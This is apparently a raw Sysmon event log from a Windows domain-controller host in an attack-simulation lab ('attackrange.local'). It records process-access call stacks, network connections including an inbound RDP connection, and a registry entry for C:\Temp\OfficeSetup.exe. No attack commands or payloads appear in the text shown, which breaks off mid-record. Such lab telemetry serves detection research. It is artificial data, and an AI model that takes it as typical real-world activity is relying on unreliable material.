14:58:52.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.888{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-130F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.888{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-130F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-130F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000081017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDBSetValue2021-04-20 14:58:52.888{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\OfficeSetup.exeBinary Data 10341000x800000000000000081016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-120F-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.825{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-120F-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.825{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-120F-00000000BB01}1112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.079{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57606-false10.0.1.12-8000- 354300x800000000000000081012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.925{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47181-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000081011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000081010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000081009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000081008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000081007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000081006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000081005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.591{A7A01FEF-EC20-607E-9B0E-00000000BB01}54966184C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000081004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-110F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.528{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-110F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.528{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-110F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.528{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=37843D8C1CB529716D8B817C9592C940,SHA256=264319DA76EB90F8FADCEA671C53EA302B89A1504BDF2ADF5B0F17111304AAFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.450{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-100F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.450{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-100F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.450{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-100F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscors